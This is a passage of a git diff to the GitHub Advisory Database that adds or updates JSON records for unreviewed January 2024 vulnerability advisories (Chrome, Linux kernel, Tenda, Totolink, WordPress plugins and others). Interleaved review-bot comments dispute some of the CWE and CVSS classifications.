@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj6r-9q35-32hf", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22647" + ], + "details": "An user enumeration vulnerability was found in SEO Panel 4.10.0. This issue occurs during user authentication, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22647" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22647" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json b/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json index 332ac053c69b8..54fe9959c3791 100644 --- a/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json +++ b/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20926" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json b/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json index 2c57391442e4e..6ca663ddcb665 100644 
--- a/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json +++ b/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hjm7-v5pw-x89r", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0807" ], "details": "Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json b/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json index 335693358a7e6..6bee6e0ccffb9 100644 --- a/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json +++ b/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hm4h-jq5c-c933", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23851" ], "details": "copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json b/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json new file mode 100644 index 0000000000000..6ded70bfaf2b9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpcp-jfj7-rjww", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-5124" + ], + "details": "The Page Builder: Pagelayer WordPress plugin before 1.8.0 doesn't prevent attackers with administrator privileges from inserting malicious JavaScript inside a post's header or footer code, even when unfiltered_html is disallowed, such as in multi-site WordPress configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5124" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/1ef86546-3467-432c-a863-1ca3e5c65bd4/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json b/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json index 24dd329cb4182..423070a464082 100644 --- a/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json +++ b/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json 
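Review bot: The second hunk of GHSA-hm4h-jq5c-c933 sets `"severity": "MODERATE"` while leaving `cwe_ids` as an empty array, so the advisory now carries a score with no weakness class; the details (`copy_params` allocating more than INT_MAX bytes because of a missing `param_kernel->data_size` check) describe an unvalidated size taken from ioctl input, which a reviewer should classify (CWE-1284, Improper Validation of Specified Quantity in Input, looks like the closest fit) rather than leave blank. The vector added in the preceding hunk scores `PR:L`; if the device-mapper control ioctl still gates on CAP_SYS_ADMIN, as it historically has, `PR:H` is the accurate value and the base score drops, so confirm the privilege requirement against `ctl_ioctl` before accepting MODERATE. Both values are NVD-supplied, so this is a flag for review rather than a local edit of the vector.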
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hr3c-fw3g-qvhf", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-46889" ], "details": "Meross MSH30Q 4.5.23 is vulnerable to Cleartext Transmission of Sensitive Information. During the device setup phase, the MSH30Q creates an unprotected Wi-Fi access point. In this phase, MSH30Q needs to connect to the Internet through a Wi-Fi router. This is why MSH30Q asks for the Wi-Fi network name (SSID) and the Wi-Fi network password. When the user enters the password, the transmission of the Wi-Fi password and name between the MSH30Q and mobile application is observed in the Wi-Fi network. Although the Wi-Fi password is encrypted, a part of the decryption algorithm is public so we complemented the missing parts to decrypt it.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json b/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json index beb246ebd43ed..e1b8369ad1242 100644 --- a/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json +++ b/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json 
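Review bot: `CWE-319` (Cleartext Transmission) in the second hunk of GHSA-hr3c-fw3g-qvhf does not match the advisory's own details, which say the Wi-Fi password is encrypted in transit but recoverable because part of the decryption algorithm is public and the rest could be reconstructed; that is a reversible, fixed-key scheme rather than cleartext. CWE-321 (Use of Hard-coded Cryptographic Key) or CWE-327 (Use of a Broken or Risky Cryptographic Algorithm) describe that better, e.g. `"cwe_ids": ["CWE-321"]`, depending on what the reference shows the firmware actually does. The CWE comes from NVD, so raise it for a reviewer instead of overriding it locally; the `AV:A/AC:L/PR:N/UI:R` vector is consistent with a proximity attacker during device onboarding and needs no change.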
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hr8f-72r6-vq27", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-23183" ], "details": "Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json b/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json index 40030fa999963..3ecec4d50bf0d 100644 --- a/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json +++ b/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hwg5-mfhv-33w6", - "modified": "2024-01-25T18:30:51Z", + "modified": "2024-01-31T18:31:24Z", "published": "2024-01-25T18:30:51Z", "aliases": [ "CVE-2024-22749" ], "details": "GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T16:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json b/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json index bb9914e775525..e3d497fde4bb5 100644 --- a/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json +++ b/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hx7j-w75q-79h5", - "modified": "2024-01-25T06:30:31Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T06:30:31Z", "aliases": [ "CVE-2023-50785" ], "details": "Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T06:15:50Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json b/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json index 2630d364f1dfa..35a82159218be 100644 --- a/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json +++ b/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2p7-j8v8-q5g2", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22725" ], "details": "Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T16:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json b/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json index 31b42aa545e3e..1875c249a4b52 100644 --- a/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json +++ b/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2wh-3mg8-x62m", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:20Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47198" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47199.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json b/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json new file mode 100644 index 0000000000000..4952564556098 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3rg-72x7-gm5r", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-37518" + ], + "details": "HCL BigFix ServiceNow is vulnerable to arbitrary code injection. A malicious authorized attacker could inject arbitrary code and execute within the context of the running user.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37518" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json b/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json index 6c380a9f18b2a..bbb5192035362 100644 --- a/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json +++ b/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json 
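Review bot: The vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N` in the new GHSA-j3rg-72x7-gm5r is inconsistent with its own details, which say an authenticated attacker can "inject arbitrary code and execute within the context of the running user"; code execution in a user's context normally implies at least `C:H/I:H`, not `C:L/I:L/A:N`, so either the impact statement or the vector is wrong. The `"severity": "MODERATE"` bucket is derived from that vector, so if the HCL KB article (KB0110202) supports the low-impact score the details should be read as a limited injection, and if the details are right the advisory is under-rated. A reviewer should check the vendor article and either keep the vector or record the discrepancy; `affected` is also empty, so nothing can match on a package version until a range is filled in.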
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j48h-6x68-4fc5", - "modified": "2024-01-24T03:31:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T03:31:25Z", "aliases": [ "CVE-2024-21765" ], "details": "Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T02:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json b/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json new file mode 100644 index 0000000000000..de4dd8f6d2c0d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8ch-gmcj-9qgp", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0991" + ], + "details": "A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0991" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252256" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252256" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json b/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json new file mode 100644 index 0000000000000..01081033b8d5e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8jv-qh5w-hrq5", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1002" + ], + "details": "A vulnerability classified as critical was found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this vulnerability is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ePort leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1002" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252271" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252271" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json b/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json new file mode 100644 index 0000000000000..d733c68548f06 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcqj-vmgc-332m", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22304" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress.This issue affects FreshMail For WordPress: from n/a through 2.3.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22304" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json b/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json new file mode 100644 index 0000000000000..fedaca6816a09 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jf97-8p4h-gh74", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T06:30:28Z", + "aliases": [ + "CVE-2024-24736" + ], + "details": "The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24736" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176784/YahooPOPs-1.6-Denial-Of-Service.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json b/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json index 07e1e309caf9b..7a0f46ee78dfe 100644 --- a/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json +++ b/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jggj-wjwc-8gg9", - "modified": "2024-01-22T00:30:19Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-22T00:30:19Z", "aliases": [ "CVE-2023-52353" ], "details": "An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ 
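Review bot: GHSA-jf97-8p4h-gh74 is created with `"severity": "HIGH"` and a full vector but an empty `cwe_ids` array, so the advisory carries a score with no weakness class; the details (remote reboot via a long string to TCP port 110, related to CVE-2004-1558) describe a length-triggered crash in the POP3 listener, which is a memory-safety class (CWE-120 family) if the Packet Storm write-up shows an overflow, so pick the CWE that reference supports rather than leave it blank, e.g. `"cwe_ids": ["CWE-120"]`. The only technical reference is a third-party exploit post with no vendor advisory or fixed version, and `affected` is empty, so consumers have nothing to match on; that is expected for an unreviewed entry but worth recording when it is reviewed.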
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-384" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T23:15:44Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json b/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json new file mode 100644 index 0000000000000..352a4457e12f0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgqm-9prw-2qr6", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T12:30:18Z", + "aliases": [ + "CVE-2024-23507" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration.This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23507" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json b/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json index 926caac72a0e1..8c2a4efefde35 100644 --- a/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json 
